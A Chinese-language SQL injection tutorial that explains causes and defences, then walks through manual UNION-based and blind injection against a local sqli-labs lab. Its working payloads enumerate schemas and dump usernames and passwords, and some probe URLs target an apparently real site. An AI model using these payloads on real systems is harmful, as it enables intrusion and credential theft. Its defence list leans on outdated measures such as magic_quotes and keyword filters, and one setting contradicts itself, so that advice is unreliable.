我們圍繞以下幾個方面來看這個問題:
1.什么是sql注入?
2.為什么要sql注入?
3.怎樣sql注入?
1.什么是sql注入?
所謂SQL注入,就是通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令,比如先前的很多影視網站泄露VIP會員密碼大多就是通過WEB表單遞交查詢字符暴出的,這類表單特別容易受到SQL注入式攻擊.當應用程序使用輸入內容來構造動態sql語句以訪問數據庫時,會發生sql注入攻擊。如果代碼使用存儲過程,而這些存儲過程作為包含未篩選的用戶輸入的字符串來傳遞,也會發生sql注入。 黑客通過SQL注入攻擊可以拿到網站數據庫的訪問權限,之后他們就可以拿到網站數據庫中所有的數據,惡意的黑客可以通過SQL注入功能篡改數據庫中的數據甚至會把數據庫中的數據毀壞掉。做為網絡開發者的你對這種黑客行為恨之入骨,當然也有必要了解一下SQL注入這種功能方式的原理並學會如何通過代碼來保護自己的網站數據庫
sql注入原理:
下面我們來說一下sql注入原理,以使讀者對sql注入攻擊有一個感性的認識,至於其他攻擊,原理是一致的。
SQL注射能使攻擊者繞過認證機制,完全控制遠程服務器上的數據庫。 SQL是結構化查詢語言的簡稱,它是訪問數據庫的事實標准。目前,大多數Web應用都使用SQL數據庫來存放應用程序的數據。幾乎所有的Web應用在后台 都使用某種SQL數據庫。跟大多數語言一樣,SQL語法允許數據庫命令和用戶數據混雜在一起的。如果開發人員不細心的話,用戶數據就有可能被解釋成命令, 這樣的話,遠程用戶就不僅能向Web應用輸入數據,而且還可以在數據庫上執行任意命令了。
SQL注入式攻擊的主要形式有兩種:
♦一是直接將代碼插入到與SQL命令串聯在一起並使得其以執行的用戶輸入變量。上面筆者舉的例子就是采用了這種方法。由於其直接與SQL語句捆綁,故也被稱為直接注入式攻擊法。
♦二是一種間接的攻擊方法,它將惡意代碼注入要在表中存儲或者作為原書據存儲的字符串。在存儲的字符串中會連接到一個動態的SQL命令中,以執行一些惡意的SQL代碼。注入過程的工作方式是提前終止文本字符串,然后追加一個新的命令。如以直接注入式攻擊為例。就是在用戶輸入變量的時候,先用一個分號結束當前的語句。然后再插入一個惡意SQL語句即可。由於插入的命令可能在執行前追加其他字符串,因此攻擊者常常用注釋標記“—”來終止注入的字符串。執行時,系統會認為此后語句位注釋,故后續的文本將被忽略,不背編譯與執行。
2.為什么要sql注入?
♦SQL注入產生的原因:程序開發過程中不注意規范書寫sql語句和對特殊字符進行過濾,導致客戶端可以通過全局變量POST和GET提交一些sql語句正常執行。
防止SQL注入:
1、開啟配置文件中的magic_quotes_gpc和magic_quotes_runtime設置
2、執行sql語句時使用addslashes進行sql語句轉換
3、Sql語句書寫盡量不要省略小引號和單引號
4、過濾掉sql語句中的一些關鍵字:update、insert、delete、select、*
5、提高數據庫表和字段的命名技巧,對一些重要的字段根據程序的特點命名,取不易被猜到的。
6、Php配置文件中設置register_globals為off,關閉全局變量注冊
7、控制錯誤信息,不要再瀏覽器上輸出錯誤信息,將錯誤信息寫到日志文件中。
如何進行防SQL注入?
1、過濾掉一些常見的數據庫操作關鍵字:select,insert,update,delete,and,*等
或者通過系統函數:addslashes(需要被過濾的內容)來進行過濾
2、在PHP配置文件中Register_globals=off;設置為關閉狀態 //作用將注冊全局變量關閉。
比如:接收POST表單的值使用$_POST['user'],如果將register_globals=on;直接使用$user可以接收表單的值。
3、SQL語句書寫的時候盡量不要省略小引號(tab鍵上面那個)和單引號
4、提高數據庫命名技巧,對於一些重要的字段根據程序的特點命名,取不易被猜到的
5、對於常用的方法加以封裝,避免直接暴漏SQL語句
6、開啟PHP安全模式Safe_mode=on;
7、打開magic_quotes_gpc來防止SQL注入Magic_quotes_gpc=off;默認是關閉的,它打開后將自動把用戶提交的sql語句的查詢進行轉換,把'轉為\',這對防止sql注入有重大作用。
因此開啟:magic_quotes_gpc=on;
8、控制錯誤信息
關閉錯誤提示信息,將錯誤信息寫到系統日志。
9、使用mysqli或pdo預處理。
一句話總結,看程序員把這些改規范的規范掉了,就是見縫插針。
3.怎樣sql注入?
為了更直觀的讓大家了解到sql注入的原理,貼上一張sql注入攻擊示意圖
●SQL注入威脅表現形式可以體現為以下幾點:
●繞過認證,獲得非法權限
●猜解后台數據庫全部的信息
●注入可以借助數據庫的存儲過程進行提權等操作
●SQL注入攻擊的典型手段
●判斷應用程序是否存在注入漏洞
●收集信息、並判斷數據庫類型
●根據注入參數類型,重構SQL語句的原貌
●猜解表名、字段名
●獲取賬戶信息、攻擊web或為下一步攻擊做准備
二、SQL注入的簡單例子
1.SQL注入漏洞的幾種判斷方法
①http://www.heetian.com/showtail.asp?id=40'
②http://www.heetian.com/showtail.asp?id=40 and 1=1
③http://www.heetian.com/showtail.asp?id=40 and 1=2
如果執行①后,頁面上提示報錯或者提示數據庫錯誤的話,說明是存在注入漏洞的。
如果執行②后,頁面正常顯示,而執行③后,頁面報錯,那么說明這個頁面是存在注入漏洞的。
因為正確的鏈接:http://www.heetian.com/showtail.asp?id=40沒有問題,如果如果執行①后,頁面上提示報錯或者提示數據庫錯誤的話說明是不滿足條件,說明查詢的條件不滿足,是有一個查詢語句的,明是存在注入漏洞,如果執行②后,頁面正常顯示,而執行③后,頁面報錯,那么說明這個頁面是存在注入漏洞的。
2.收集信息、判斷數據庫類型
從其返回的信息中可以判斷下數據庫的類型,更多可能可以知道部分數據庫中的字段以及其他有用信息,為下一步攻擊提供鋪墊。
3.根據注入參數類型,重構SQL語句的原貌
①ID=40 這類注入的參數是數字型,那么SQL語句的原貌大致是:Select*from 表名 where 字段=40
②name=電影 這類注入的參數是字符型,SQL語句原貌大致是:Select*from 表名 where 字段=‘電影’
③搜索時沒有過濾參數的,如keyword=關鍵字,SQL語句原貌大致是:Select*from 表名 where 字段 like ‘%關鍵字%’
4.猜解表名、字段名(直接將SQL語句添加到URL后)
①and exists(select*from 表名)
如果頁面沒有任何變化,說明附加條件成立,那么就是說明猜解的表名正確,反之,就是不存在這個表,接下來就繼續猜解,知道正確
②and exists(select 字段 from 表名)
方法原理同上
③猜解字段內容(利用以上猜解出的表名和字段名 方法較古老且麻煩)
●猜解字段內容的長度
(select top 1 len(字段名)from 表名)>0 直至猜解到>n不成立的時候,得出字段的長度為:n+1。
●得到長度后,猜解具體的內容
(select top 1 asc(mid(username,1,1))from 表名)>0直到>m不成立時,就可以猜解出ASCII碼值了。
當然我們猜猜表明猜字段還有其他的方法,下一遍我就用其他的方法給大家演示一下。
前言
這篇文章就是一個最基本的SQl手工注入的過程了。基本上在sqlilabs上面的實驗,如果知道了其中的全部知識點,都可以通過以下的步驟進行脫褲。下面的這個步驟也是其他的脫褲手段的基礎。如果想要精通SQL注入,那么這個最基本的脫褲步驟是必須了解和掌握的。
為了方便說明,我們還是用之前的數字型的注入點為例來進行說明。
整體步驟:
1. 判斷是不是注入點
2.得到字段總數
3.得到顯示位
4.查選庫
5.查選表名
6.查選列名
7.脫褲(就是得到我們想得到列名的值)
1. 判斷是不是注入點
SQL注入漏洞的幾種判斷方法
①http://localhost/sqlilabs/Less-2/?id=1id'
②http://localhost/sqlilabs/Less-2/?id=1id and 1=1
③http://localhost/sqlilabs/Less-2/?id=1id and 1=2
如果執行①后,頁面上提示報錯或者提示數據庫錯誤的話,說明是存在注入漏洞的。
如果執行②后,頁面正常顯示,而執行③后,頁面報錯,那么說明這個頁面是存在注入漏洞的。
就說明http://localhost/sqlilabs/Less-2/?id=1id
2.得到字段總數
♦后台的SQL語句的寫法大致為:
select username,password,[....] from table where id=userinput
♦那么我們通過使用order by的語句來判斷select所查詢字段的數目。
那么payload變為:
http://localhost/sqlilabs/Less-2/?id=1 order by 1/2/3/4....
當使用order by 4時程序出錯,那么select的字段一共是3個。
3.得到顯示位
♦在頁面上會顯示從select中選取的字段,我們接下來就是要判斷顯示的字段是哪幾個字段。
使用如下的payload(兩者均可)進行判斷。
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,3 http://localhost/sqlilabs/Less-2/?id=1 and 1=2 union select 1,2,3
當使用個如上的payload時,頁面的顯示如下:
通過如上的頁面顯示就可以知道,頁面中顯示的是第2位和第3位的信息。
4.查選庫
♦在知道了顯示位之后,那么接下來就可以通過顯示位來顯示我們想知道的信息,如數據庫的版本,用戶信息等等。那么我們使用如下的payload就可以知道相關的信息。
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,version(),database()
此時頁面的顯示為:
那么接下來我們通過這種方式知道數據庫中所有的數據庫的名稱。
payload如下:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 0,1 #得到第一個庫名 http://localhost/sqlilabs/Less-2/?id=-1 union select 1,2,SCHEMA_NAME, from information_schema.SCHEMATA limit 1,1 #得到第二個庫名 ...
5.查選表名
♦由於database()返回的就是當前web程序所使用的數據庫名,那么我們就利用database()來查詢所有的表信息。當然在上一步中。我們也已經知道當前的database就是security。
那么我們構造的payload如下:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
這樣我們就得到當前數據庫下所有的表名了。頁面返回的結果是:
所以我們知道在當前的數據庫中存在4張表,分別是emails,referers,uagents,users。
6.查選列名
♦在知道了表名之后,接下來我們利用information_schema.columns就可以根據表名來獲取當前表中所有的字段。
payload如下:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273(users的十六進制)
頁面的顯示結果如下:
通過這個語句,我們就知道在users表中存在USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,id,name,password這些字段。但是我本地測試的測試的時候,這個存在一個問題,實際上在security數據庫的users的表中,只有id,username,password這3個字段,其他的字段都是其他數據庫的中users表的字段名。
通過上面的payload,我們也同樣可以知道在emails,referers,uagents中的字段名稱。
但是有的時候后台的代碼可能僅用了使用where子句,那么這個時候就無法通過information_schema.coumns來得到列名了,這個時候只能夠根據你自己多年的黑客經驗來進行猜解了。猜解的方法也是比較的簡單,使用exists子句就可以進行猜解了。假設在我們已經知道了表名的情況下(當然猜解表名也使用通過exists子句來完成)。
猜解的語句如下:
http://localhost/sqlilabs/Less-2/?id=1 and exists(select uname from users)
主要的語句就是exists(select 需要猜解的列名 from users)這種句式。如果在users表中不存在uname列名,則頁面不會顯示內容或者是直接出現sql的錯誤語句。
如下如所示:
下面這個就是猜解到了users表中存在的字段。
http://localhost/sqlilabs/Less-2/?id=1 and exists(select username from users)
猜測在users表中存在username列,上面的語句程序可以正常第返回結果,那么壽命在users表中確實存在username列名。
7.脫褲(就是得到我們想得到列名的值)
在知道了當前數據庫所有的表名和字段名之后,接下來我們就可以dump數據庫中所有的信息了。比如我們下載當前users表中所有的數據。
可以使用如下的payload:
http://localhost/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username,password),3 from users
就可以得到users表中所有的username和password的數據了,通過這種方式也能夠得到其他表中的數據了。
總結:這就是sql注入的原理,但是你必須知道:
1.mysql的系統函數
2.了解下union
3.order by 用於對結果集進行排序
4.mysql數據庫重要四個數據庫庫:information_schema proformation_schema mysql test
5.三個重要數據表:table_name table_schema table_type
6.理解schema,schemata,schema_name,table_schema的含義很重要!很重要!很重要!(說三遍~)
這些我會在下來寫一下。